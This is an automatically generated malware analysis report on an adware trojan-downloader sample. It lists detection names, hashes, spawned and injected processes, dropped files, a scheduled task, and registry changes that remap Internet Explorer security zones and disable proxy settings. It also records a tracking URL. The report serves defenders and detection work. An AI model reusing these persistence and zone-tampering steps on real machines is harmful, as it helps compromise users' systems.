Gen.Variant.Zusy.192658_4824064546

by malwarelabrobot on July 20th, 2016 in Malware Descriptions.

Gen:Variant.Zusy.192658 (BitDefender), not-a-virus:HEUR:AdWare.Win32.Amonetize.gen (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.DownLoader21.55469 (DrWeb), Gen:Variant.Zusy.192658 (B) (Emsisoft), Artemis!482406454620 (McAfee), Heur.AdvML.C (Symantec), Trojan-Downloader.Win32.Adload (Ikarus), Gen:Variant.Zusy.192658 (FSecure), Win32/DH{Y1clgQ8} (AVG), Win32:Adware-gen [Adw] (Avast), TROJ_GEN.R08NC0EFM16 (TrendMicro), Gen:Variant.Zusy.192658 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Adware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 482406454620b99c79cd268a1fd237c8
SHA1: 442e39e5faf1c89fb3ba23673ffd240dee6c39e8
SHA256: d1fe38a5f596850b73a252125e42c20d713a655a40d31cd7de5dd87f90088834
SSDeep: 12288:kq4p0LAogZM2h vdEd6ycYZw5j7eLRf2Ss2xkA:kq4WAvHd3cbfgtJxkA
Size: 719364 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: adsafiliados
Created at: 2016-05-05 11:13:33
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

amisetup7548__10235_il2.exe:1004
chcUpdateTsk.exe:1096
chcUpdateSrv.html5:1700
chcUpdateSrv.html5:548
ckehack.html5:1692
ckehack.html5:468
ckehack.html5:456
ckehack.html5:2032
nop.exe:1512
1.tmp.exe:1340
1.tmp.exe:1836
1.tmp.exe:2732
ping.exe:560
ping.exe:1008
regsvr32.exe:1500
amisetup7604__99999_il2.exe:652
rundll32.exe:1608
tmnqck.exe:2024
chcUpdateTsk.html5:1240

The Trojan injects its code into the following process(es):

%original file name%.exe:600
1.tmp.exe:3248
amisetup7849__99999_il2.exe:3340

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process amisetup7548__10235_il2.exe:1004 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\amipb[1].js (32425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amisetup7548__10235_il2.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\index[1].htm (2197 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (39 bytes)

The process chcUpdateTsk.exe:1096 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\MR05AJUV\desktop.ini (67 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CZW1U92J\desktop.ini (67 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\C1W14R8D\desktop.ini (67 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\YHAV8105\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\desktop.ini (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\desktop.ini (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7 (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7 (0 bytes)

The process chcUpdateSrv.html5:1700 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\LocalService\Cookies\index.dat (388 bytes)
%Documents and Settings%\LocalService\Cookies\system@upxnav[1].txt (212 bytes)

The process chcUpdateSrv.html5:548 makes changes in the file system.
The Trojan deletes the following file(s):

%Program Files%\Chocosyledusy\chcUpdateSrv.html5.ini (0 bytes)

The process ckehack.html5:1692 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\matile.dll (1425 bytes)

The Trojan deletes the following file(s):

%Program Files%\Coabuied\matile.dll (0 bytes)
%Program Files%\Coabuied\wihoy.dll (0 bytes)

The process ckehack.html5:468 makes changes in the file system.
The Trojan deletes the following file(s):

%Program Files%\Coabuied\DeElevator.dll (0 bytes)
%Program Files%\Coabuied\config.ini (0 bytes)
%Program Files%\Coabuied\shehele.dat (0 bytes)
%Program Files%\Coabuied\ckehack.html5 (0 bytes)

The process ckehack.html5:2032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

The Trojan deletes the following file(s):

%Program Files%\Coabuied\@A3592ADB-854A-443A-854E-EB92130D470D.xpi (0 bytes)

The process nop.exe:1512 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp (0 bytes)

The process 1.tmp.exe:1340 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\awh2.tmp (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh3.tmp (105356 bytes)

The process 1.tmp.exe:1836 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\awh4.tmp (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh5.tmp (105356 bytes)

The process 1.tmp.exe:2732 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\awhA.tmp (103196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh9.tmp (177 bytes)

The process %original file name%.exe:600 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\prepreinstaller_win.exe (4013 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\Bundle[1].exe (30186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\prepreinstaller_win[1].exe (30122 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MUpdater.exe.config (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp.exe (3416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1OITCXMZ\MUpdater.exe[1].config (165 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (0 bytes)

The process regsvr32.exe:1500 makes changes in the file system.
The Trojan deletes the following file(s):

%System%\verclsid.exe (0 bytes)

The process amisetup7604__99999_il2.exe:652 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\awh6.tmp (3560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\index[1].htm (1203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh7.tmp (45428 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amisetup7604__99999_il2.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (18 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmnqck.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\index[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nop.exe (0 bytes)

The process rundll32.exe:1608 makes changes in the file system.
The Trojan deletes the following file(s):

%Program Files%\Atidogrudck\atdagent.dll.ini (0 bytes)

The process tmnqck.exe:2024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\{DD51A01D-FCBE-4AA1-B167-045919599065} (164908 bytes)
%Program Files%\Chocosyledusy\chcUpdateSrv.html5 (3749 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\1.n[1].txt (164388 bytes)
%Program Files%\Coabuied\ckehack.html5 (8 bytes)
%Program Files%\Coabuied\Chocosyledusy.7z2 (1693 bytes)
%Program Files%\Coabuied\config.ini (147 bytes)
%Program Files%\Coabuied\@A3592ADB-854A-443A-854E-EB92130D470D.xpi (1612 bytes)
%Program Files%\Coabuied\wihoy.dll (1657 bytes)
%Program Files%\Atidogrudck\atdagent.dll (1717 bytes)
%Program Files%\Coabuied\DeElevator.dll (260 bytes)
%Program Files%\Coabuied\conf.json (877 bytes)
%Program Files%\Coabuied\shehele.dat (260 bytes)
%Program Files%\Coabuied\matile.dll (309 bytes)
%Program Files%\Chocosyledusy\chcUpdateSrv.html5.ini (247 bytes)
%Program Files%\Atidogrudck\atdagent.dll.ini (91 bytes)
%Program Files%\Chocosyledusy\chcUpdateTsk.html5.ini (247 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{B45A900F-0CB7-44A9-89C2-F36A56D5F94E} (653285 bytes)
%Program Files%\Chocosyledusy\chcUpdateTsk.html5 (324 bytes)
%Program Files%\Coabuied\Atidogrudck.7z2 (169 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\{DD51A01D-FCBE-4AA1-B167-045919599065} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1OITCXMZ\84[1].htm (0 bytes)
%Program Files%\Coabuied\Atidogrudck.7z2 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{B45A900F-0CB7-44A9-89C2-F36A56D5F94E} (0 bytes)
%Program Files%\Coabuied\conf.json (0 bytes)
%Program Files%\Coabuied\Chocosyledusy.7z2 (0 bytes)

The process chcUpdateTsk.html5:1240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\Chocosyledusy Update.job (5526 bytes)

The Trojan deletes the following file(s):

%Program Files%\Chocosyledusy\chcUpdateTsk.html5.ini (0 bytes)

Registry activity

The process amisetup7548__10235_il2.exe:1004 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}]
"(Default)" = "IBoot"

[HKCR\telexes.compiles\CurVer]
"(Default)" = "telexes.compiles.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7548__10235_il2.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\Version]
"(Default)" = "1.0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\TypeLib]
"(Default)" = "{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"

[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7548__10235_il2.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup7548__10235_il2\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\TypeLib]
"(Default)" = "{de2deba6-37b4-4d2f-8a78-56effa49ba84}"

[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0]
"(Default)" = "InstallerLib"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}]
"(Default)" = "Inst Class"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "amisetup7548__10235_il2.exe"

[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\VersionIndependentProgID]
"(Default)" = "telexes.compiles"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKCR\telexes.compiles.1\CLSID]
"(Default)" = "{4cf1ec1d-2055-4a46-b248-11fb57f52868}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1468883313"

[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 A9 31 FE 36 65 18 E7 73 13 18 1B E4 85 C1 3C"

[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\ProgID]
"(Default)" = "telexes.compiles.1"

[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCR\telexes.compiles]
"(Default)" = "Inst Class"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7548__10235_il2.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCR\telexes.compiles.1]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\Programmable]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}]
[HKCR\telexes.compiles.1]
[HKCR\telexes.compiles]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\Version]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid32]
[HKCR\telexes.compiles\CurVer]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\0]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\0\win32]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\TypeLib]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\ProgID]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\VersionIndependentProgID]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\FLAGS]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\HELPDIR]
[HKCR\telexes.compiles.1\CLSID]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\TypeLib]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
"ServerExecutable"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup7548__10235_il2\DEBUG]
"Trace Level"

The process chcUpdateTsk.exe:1096 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\chcUpdateTsk\DEBUG]
"Trace Level"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process chcUpdateSrv.html5:1700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\chcUpdateSrv\DEBUG]
"Trace Level"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

The process chcUpdateSrv.html5:548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 8B C1 73 98 FB 1E AB A1 D6 76 64 68 27 B7 57"

The process ckehack.html5:1692 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft]
"help" = "http://d2ucfwpxlh3zh3.cloudfront.net/?ts=AHEqC3UsBH8sC0..&v=20160718&uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&mode=loadmex"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 5B E1 3B 4D 28 1C B9 D1 41 D5 BC 8C 3E 05 E5"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKCU\Software\Microsoft]
"First" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The process ckehack.html5:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 37 E0 7B AF 05 D1 FD 9A 2C EE AA D8 71 AE 19"

[HKLM\SOFTWARE\{E6276374-DE18-4AA5-A365-9016A2F98A2D}]
"F" = "1"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\Coabuied\DeElevator.dllg1t,"

[HKLM\SOFTWARE\{E6276374-DE18-4AA5-A365-9016A2F98A2D}]
"c" = "1"

The process ckehack.html5:456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\ckehack\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

